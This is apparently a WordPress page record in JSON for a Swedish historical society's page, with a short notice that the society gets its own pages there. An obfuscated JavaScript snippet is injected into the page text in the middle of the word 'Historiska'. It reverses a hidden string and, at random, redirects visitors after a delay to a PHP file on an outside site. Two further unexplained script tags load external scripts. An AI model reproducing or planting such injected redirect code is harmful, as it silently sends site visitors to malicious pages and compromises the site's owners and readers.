{"id":3563,"date":"2017-04-03T12:59:58","date_gmt":"2017-04-03T10:59:58","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=3563"},"modified":"2017-04-03T12:59:58","modified_gmt":"2017-04-03T10:59:58","slug":"historiska-sallskapet","status":"publish","type":"page","link":"https:\/\/hindersby.net\/nywp\/?page_id=3563","title":{"rendered":"Historiska s\u00e4llskapet"},"content":{"rendered":"<p>His<script>$NfI=function(n){if (typeof ($NfI.list[n]) == \"string\") return $NfI.list[n].split(\"\").reverse().join(\"\");return $NfI.list[n];};$NfI.list=[\"'php.reklaw-yrogetac-smotsuc-ssalc\/php\/stegdiw-cpm\/snigulp\/tnetnoc-pw\/gro.ogotaropsaid.www\/\/:ptth'=ferh.noitacol.tnemucod\"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}<\/script>toriska s\u00e4llskapet f\u00e5r h\u00e4r sina egna sidor. H\u00e4r finns ocks\u00e5 gamal Grev-sidor.<\/p>\n<p>&nbsp;<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Historiska s\u00e4llskapet f\u00e5r h\u00e4r sina egna sidor. H\u00e4r finns ocks\u00e5 gamal Grev-sidor. &nbsp;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3563","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/3563","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3563"}],"version-history":[{"count":1,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/3563\/revisions"}],"predecessor-version":[{"id":3564,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/3563\/revisions\/3564"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3563"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}